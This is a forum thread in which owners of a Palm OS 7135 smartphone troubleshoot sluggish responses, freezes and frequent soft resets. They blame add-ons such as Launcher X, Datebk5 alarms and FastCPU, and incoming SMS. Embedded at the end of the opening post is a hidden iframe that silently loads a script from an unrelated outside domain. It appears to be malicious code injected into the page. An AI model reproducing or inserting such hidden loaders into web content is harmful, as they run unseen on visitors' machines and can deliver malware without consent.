+ Reply to Thread
Page 1 of 2 1 2 LastLast

My 7135 gets lethargic

I've run into a little problem with my 7135, it seems to get "confused" every now and then. What I mean is that it starts to react very slowly to what I tell it to do. Just now I opened the flip and the sound didn't play, the screen came up but wouldn't respond. I closed it again and the screen stayed lit. I opened it and tapped on the screen again, nothing. So I decided to wait and about 20 seconds later is started going crazy, playing opening and closing sounds and clicking all over (from all the tapping I did when it wasn't responding).

I've been doing soft-resets much more often then I would have imagined would be necessary, and more than I'm comfortable with. My question: is this normal Palm OS behavior? Should I expect to soft-reset a couple times per day? Anyone have any ideas what I can do to minimize this? I installed BackupBuddyVFS, the trial version which I am now going to purchase, but I'm still afraid that I might lose something that I'm working on if it crashes during use. And recalibrating the digitizer is getting tedious.

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Sorry, but I no longer make 7135 headset adapters.

you can turn off the calibration. the next time you do a soft reset click on the box that says "don't show this again."

hmmmmmm - sounds as if it may be time to seriously consider exchanging it.

I'd suspect that you have some piece of software installed that is gumming up the works. By the way, how's your stereo adapter doing? Did you test it yet?

I have the exact same behavior going on. I do *not* believe there is a problem with the phone. Being a long time "power" palm user, I have about 14 megs in RAM used, as well as a good part of the 256 meg card, using PiDirect. I'm 99% sure jazmaan is correct. I sometimes think that this old, 33 mhz processor is just not quite up to what we'd really like it to do, but that's what we've got. Even if you have much less installed than I'm using, it is likely some piece of software (or hacks) that is causing the problem....

By the way, I paid for a registered version of Launcher X, but now I regret it, because it definitely delays things while its loading and "scanning."

Originally posted by davemayo
    you can turn off the calibration. the next time you do a soft reset click on the box that says "don't show this again."
    I hadn't even seen that option. Thanks! I'll look for it next time.

Originally posted by jazmaan
    I'd suspect that you have some piece of software installed that is gumming up the works. By the way, how's your stereo adapter doing? Did you test it yet?
    Well, I haven't installed much. I tried an Ameritrade PQA, that didn't work so I didn't try it again, could that be it? Other than that I've just got Pocket Quicken, MyBible, Pegged! and BackupBuddyVFS. I'll try taking the Ameritrade thing off, since I've found a different way of getting logged on anyway.

Yes, the adapters work great! I've shipped two so far, and I'll be shipping the rest of the pre-orders Mon. and Tue. I hope to be able to get an actual stock going after that so I can ship them out as the orders come in. Want one?

Originally posted by jazmaan
    By the way, I paid for a registered version of Launcher X, but now I regret it, because it definitely delays things while its loading and "scanning."
    Go to Launcher X Prefs and change App Refresh to Manual. Then you can refresh when you want to with the"yin-yang"button on the main screen. This is one of the strengths of X - to do it yourself.

I have noticed the lethergy thing under a few situations. If I am in a low signal strength area, and the phone goes into "searching" mode, I get delayed response in the Palm apps. If I am receiving an SMS message, before any other indication appears, the palm apps will start to slow down. And if I am playing MP3's in the background, everything seems to react slower.

Alan

Does FastCPU correct all of this?

By the way, I experience the temporary freeze tag during an incoming SMS on my 6035 all the time.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by alanb
    I have noticed the lethergy thing under a few situations. If I am in a low signal strength area, and the phone goes into "searching" mode, I get delayed response in the Palm apps. If I am receiving an SMS message, before any other indication appears, the palm apps will start to slow down. And if I am playing MP3's in the background, everything seems to react slower.

Alan
    Alanb,

Whenever the phone side needs to communicate with the Palm side causing a beep / vibrate / status light (getting SMS, lost network/searching, etc) there will be a slight delay. I used to notice this all the time with my 6035 which would go on and off the network in our office.

As far as the longer delays that others in this thread are noticing -- this is not normal. I was having these pauses and occasional (2-3 a day) lockups when I had Datebk5 handling alarms. Since I disabled that, I have had no delays or lockups.

Glenn

Glenn,
    You should really write to Pimlico about the DateBK5 alarms issue if you haven't already. I know that he is way into his Sony Clie PEG-NX70 and doesn't feel the need to own a 7135, but perhaps he could still figure something out. He seems like a great and brilliant guy.
    ~'kito
    pdaPhoneHome Moderator

Markito,

I have dealt with him before regarding some 6035 problems, and will look into this. But I do beleive that Pimlico's app (Datebk5) plays by the rules and that the problem is with the phone software. It looks like BugMe people are having problems with alarms too.

Before we hound Pimlico, we should check the latest Verizon and Palm software to see if general alarm problems are fixed.

Remeber, there are many more DatebkX users than 6035/7135 users...

Glenn

A couple things. A pqa should definitely NOT be the cause of the delays. I do use datebk5 and let it handle alarms. This (I thought) has been working fine. I've had the problem of delays over the weekend, when there were NO alarms from Datebk5 scheduled, so I doubt that's it, but not impossible. As for FastCPU, I used that extensively over the past week and after a lot of tweaking of settings (need to have normal speed for all phone/data apps), I decided to disable it for now- I especially did this because I thought it might be the culprit for these delays. Although it's already deactivated, I'm going to try deleting it and see if that makes any difference (don't think it should). I've pretty much decided that although the speed increase would be great, the integration in the OS of the palm and phone is just "too much" to then add in overspeeding the processor...

Good Tip

I have been using Launcher X as a trial for the past week or so. Was also going to try Megalauncher too. The refresh was buggin the ^#^#^% out of me. Thanks for the tip.

Jeff

Originally posted by michael1
    Go to Launcher X Prefs and change App Refresh to Manual. Then you can refresh when you want to with the"yin-yang"button on the main screen. This is one of the strengths of X - to do it yourself.
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Originally posted by glenn_butler

Before we hound Pimlico, we should check the latest Verizon and Palm software to see if general alarm problems are fixed.
    I have the latest version and I had problem with the alarms so stopped having Datebk5 handle them. Pimlico is very good about putting in fixes once he gets a number of requests so I'll write him too.

Not using alarms via Datebk 5

I also am not letting Datebk5 handle alarms. They are so incredibly loud - deafening. Yes, if I needed to be shaken out of a coma that might work - but I cannot change the volume at all. No matter what I have the prefs set for on the PDA side.

I would be happy to have a fix for this since I prefer the Datebk5 options but cannot deal with the racket!

Originally posted by Markito
    Does FastCPU correct all of this?

By the way, I experience the temporary freeze tag during an incoming SMS on my 6035 all the time.
    what I can't stand is the fact the the whole phone freezes up while it's receiving the "message" indicator. Whether it's a voice mail or a text message. I'll have 7 digits dialed out on keypad and all of a sudden "incoming message" appears and you have to redial the whole number.... pisses me off... especially when your receiving a dumping of text messages.....

I'm still trying to track down the cause of this intermittent problem. At times, when opening the flip, the screen is frozen (buttons don't do anything) for about 5-10 seconds- then it works fine. It is intermittent, and I can't track it to any specific software (although I do have a lot on there!). I *can* say that disabling Datebk5 handling of alarms, and disabling all hacks does not resolve it. After a soft reset, it is much better, at least for awhile. Any thoughts here-- I'm quite sure it is *some* type of software causing the problem....